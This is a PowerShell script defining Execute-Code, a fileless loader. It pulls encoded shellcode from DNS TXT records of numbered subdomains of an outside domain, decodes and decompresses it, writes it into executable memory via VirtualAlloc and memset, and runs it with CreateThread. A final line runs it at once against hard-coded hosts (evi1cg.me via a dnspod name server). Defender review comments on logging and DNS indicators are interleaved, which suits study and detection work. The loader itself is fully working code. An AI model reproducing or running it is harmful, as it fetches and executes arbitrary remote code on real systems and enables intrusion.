function Execute-Code
{
<#
.SYNOPSIS
Fetches an encoded payload from DNS TXT records and runs it inside the current PowerShell process.
.DESCRIPTION
Queries the TXT records of 1.<Shelldomain> through <Subdomains>.<Shelldomain> with nslookup
against the given name server, joins the quoted record text, Base64-decodes and
Deflate-decompresses it, turns the resulting text into a byte array, copies the bytes into
memory returned by VirtualAlloc and starts a thread at that address with CreateThread.

Review notes for defenders:
- The payload never touches disk as a file; it arrives as DNS TXT answers. DNS query logs
  showing TXT lookups for sequentially numbered subdomains sent to an explicitly named
  resolver are the network-side trace of this script.
- nslookup is started as an external command from PowerShell, so process-creation logging
  should show it as a child of the PowerShell host.
- Add-Type with P/Invoke signatures for VirtualAlloc/CreateThread/memset is visible in
  PowerShell script block logging (event ID 4104) and to AMSI-aware products.
.PARAMETER Shelldomain
The domain (or subdomain) whose subdomains' TXT records hold the shellcode.
.PARAMETER subdomains
The number of subdomains used to provide the shellcode from their TXT records.
.PARAMETER AUTHNS
Authoritative Name Server for the domains.
.EXAMPLE
PS > Execute-Code
The payload will ask for all required options.

.EXAMPLE
PS > Execute-Code -Shelldomain 32.alteredsecurity.com -SubDomains 5 -AUTHNS f1g1ns2.dnspod.net.
Use the above from a non-interactive shell.
#>
	[CmdletBinding()] Param(
        # Parent name; the loop below prepends 1., 2., ... to it.
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $Shelldomain,

        # Upper bound of the numbered-subdomain loop (declared as a string).
        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Subdomains,
        
        # Name server handed to nslookup as its server argument.
        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $AUTHNS

    )
	# Retrieves the TXT record text for each numbered subdomain and returns the decoded,
	# decompressed payload as a string. Reads $subdomains and $AUTHNS from the enclosing
	# function's scope; only $Shelldomain is passed in.
	function Get-ShellCode
    {
		Param(
            [Parameter()]
            [String]
            $Shelldomain
        )
        $i = 1
        while ($i -le $subdomains)
        {
            # The command line is built by string interpolation and run through
            # Invoke-Expression; nslookup runs as an external process.
            $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$Shelldomain $AUTHNS") 
            # Keep only the output lines that contain a double quote (the TXT record text).
            $temp = $getcommand | select-string -pattern "`""
            $tmp1 = ""
            $tmp1 = $tmp1 + $temp
            # Append this record to the accumulated data, then strip whitespace and quotes.
            $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", ""
            $i++
        }
	    #$encdata = "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"
        # Base64 -> raw bytes -> Deflate decompression -> text.
        $dec = [System.Convert]::FromBase64String($encdata)
        $ms = New-Object System.IO.MemoryStream
        $ms.Write($dec, 0, $dec.Length)
        # Rewind so the decompressor reads from the start of the buffer.
        $ms.Seek(0,0) | Out-Null
        $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
        $sr = New-Object System.IO.StreamReader($cs)
        $sc = $sr.readtoend()
		return $sc
    }
	# Converts a hex string in several common notations into a byte array.
	# Within this function it is referenced only by a commented-out call further down.
	function Convert-HexStringToByteArray {
		[CmdletBinding()]
		Param ( [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [String] $String )
  		#Clean out whitespaces and any other non-hex crud.
		$String = $String.ToLower() -replace '[^a-f0-9\\\,x\-\:]',''
 		#Try to put into canonical colon-delimited format.
		$String = $String -replace '0x|\\x|\-|,',':'
		#Remove beginning and ending colons, and other detritus.
		$String = $String -replace '^:+|:+$|x|\\',''
		#Maybe there's nothing left over to convert...
		if ($String.Length -eq 0) { ,@() ; return } 
 		#Split string with or without colon delimiters.
		if ($String.Length -eq 1)
		{ ,@([System.Convert]::ToByte($String,16)) }
		elseif (($String.Length % 2 -eq 0) -and ($String.IndexOf(":") -eq -1))
		{ ,@($String -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}}) }
		elseif ($String.IndexOf(":") -ne -1)
		{ ,@($String -split ':+' | foreach-object {[System.Convert]::ToByte($_,16)}) }
		else
		{ ,@() }
		#The strange ",@(...)" syntax is needed to force the output into an
		#array even if there is only one element in the output (or none).
	}
    $Shell = (Get-ShellCode $Shelldomain)
    #Remove unrequired things from msf shellcode
    # Strips newlines, the "[Byte[]] $buf =" prefix, "$buf += " continuations and spaces,
    # leaving one comma-separated list of byte values.
    $tmp = $Shell -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " "
    #[Byte[]]$sc =   Convert-HexStringToByteArray($tmp) 
    # Each comma-separated token is cast to a byte.
    [Byte[]]$sc = $tmp -split ','
    #Code Execution logic
    # P/Invoke signatures compiled at run time by Add-Type below. The text between the
    # here-string markers is C#, not PowerShell.
	$code = @"
	[DllImport("kernel32.dll")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	[DllImport("kernel32.dll")]
	public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	[DllImport("msvcrt.dll")]
	public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
    # Exposes the three native functions as static methods of Win32Functions.Win32.
    $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
	$size = 0x1000 
    if ($sc.Length -gt 0x1000) {$size = $sc.Length} 
    # The last argument (flProtect) is 0x40, PAGE_EXECUTE_READWRITE: memory that is both
    # writable and executable, a common trigger for memory-scanning EDR rules.
    $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) 
    # Copies the payload into the allocation one byte per memset call.
    for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], 1)}
	Try {
        # Starts a new thread in the PowerShell process at the allocated address, then
        # sleeps so the host process stays alive while that thread runs.
        $winFunc::CreateThread(0,0,$x,0,0,0)
        sleep 100000
		}
	Catch
	{
	# Emits the System.Exception type object and a fixed string; the caught error itself
	# is not reported.
	[system.exception]
	"caught a system exception"
	}
}
# Runs the function as soon as the script is executed or dot-sourced, with hard-coded values.
# With -subdomains 3 the loop in Get-ShellCode issues TXT queries for 1.32.evi1cg.me,
# 2.32.evi1cg.me and 3.32.evi1cg.me; these names are the indicators to look for in DNS logs.
# NOTE(review): the name server looks like a DNS hosting provider's host and is probably
# shared with unrelated domains, so it is a weak indicator on its own - confirm before blocking.
Execute-Code -Shelldomain 32.evi1cg.me -subdomains 3 -AUTHNS f1g1ns2.dnspod.net